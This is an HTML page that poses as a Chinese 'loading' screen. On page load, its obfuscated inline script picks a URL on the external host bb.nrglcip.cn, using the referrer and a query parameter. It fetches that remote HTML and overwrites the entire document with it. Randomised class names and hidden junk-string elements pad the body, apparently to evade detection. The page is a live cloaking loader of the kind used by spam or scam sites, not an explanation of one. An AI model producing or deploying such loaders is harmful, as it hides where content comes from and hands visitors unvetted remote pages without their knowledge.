<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bzyaAbbAk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bzyaAbbAk .KnASmMjeza {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bzyaAbbAk .content {
            line-height: 50px;
            text-align: center
        }

        .bzyaAbbAk .img {
            width: 100%
        }

        .bzyaAbbAk .FVG2XFwEMi {
            text-align: center
        }

        .bzyaAbbAk .FVG2XFwEMi span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bzyaAbbAk .FVG2XFwEMi span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bzyaAbbAk .FVG2XFwEMi span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bzyaAbbAk .FVG2XFwEMi span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bzyaAbbAk .FVG2XFwEMi span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bzyaAbbAk .FVG2XFwEMi span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bzyaAbbAk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bakPNiS9W8gwQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var C7pH8 = bakPNiS9W8gwQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ C7pH8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ C7pH8 +".html?a=share";
		}
		
        OThYHW=url+"#"+new Date().getTime();
        OThYHW && function() {
            $.get(OThYHW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >x4DF0PY2acmjkizWFEEbHo7sHobXE3sKyVOuWH1</li>
<li style='display:none' >x4DF0PY2acmjkizWFEEbHo7sHobXE3sKyVOuWH1</li>
<li style='display:none' >x4DF0PY2acmjkizWFEEbHo7sHobXE3sKyVOuWH1</li>
<h1 style='display:none' >FWQQPg9ljPEcn3e9032zOeOHQj2Lg4F8nMrXFgS2ELF3oMvT6UuiprW0jDOTT537mzbpwCU9BxonkXq0THT1sB0UjAQMw6Z9KSH</h1>
<b style='display:none' >WiEebcVlQe3MHzkjsKvSx3wxMHcM4wByZFdpvDhVA0</b>
<ul style='display:none' >UbXCFGnCvDfNZHaKdmEmBdU6m39vmJMdeq9lRMwHI2GzPsCCvw16W8nz7np</ul>
<li style='display:none' >x4DF0PY2acmjkizWFEEbHo7sHobXE3sKyVOuWH1</li>
<h1 style='display:none' >FWQQPg9ljPEcn3e9032zOeOHQj2Lg4F8nMrXFgS2ELF3oMvT6UuiprW0jDOTT537mzbpwCU9BxonkXq0THT1sB0UjAQMw6Z9KSH</h1>
<h1 style='display:none' >FWQQPg9ljPEcn3e9032zOeOHQj2Lg4F8nMrXFgS2ELF3oMvT6UuiprW0jDOTT537mzbpwCU9BxonkXq0THT1sB0UjAQMw6Z9KSH</h1>
<span style='display:none'>F4t124JfeqBsFntZ1jva26zLe9c8tTHXVPJoVuYWEBRIQDqQI5n3H38EIrr8mH</span><div class="bzyaAbbAk">
    <div class="KnASmMjeza">
        <div class="FVG2XFwEMi">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >ieDepH70rpAJKmVx7GN9OLxEKh3nY6nSOyRg7FuFuW</ul>
<h1 style='display:none' >p2eq2tXWZAeDomVMm2xftUlYwMDUPKKqos8VdwjHw</h1>
<span style='display:none'>tNyvUCmHk3cKsImgLbBY9WySa6X3ylESwIfT0wwMFRT5Aurbk</span>
<div style='display:none'>loxPy9tU0diFjBgyMNquwEkHwmHBUpCmIrmdQ4iEgTwwqFUkj9c3V13DnWcQF4f</div>
<li style='display:none' >EzDjcyseZ0YlhLiAEetnxu66gD51pE7NjnGrStiA9s45S7idGuuAoTMnljZHZrJJ7zSfoA8gokuC43C9gVn37a1eqg6urynsaBcf</li></body>
</html>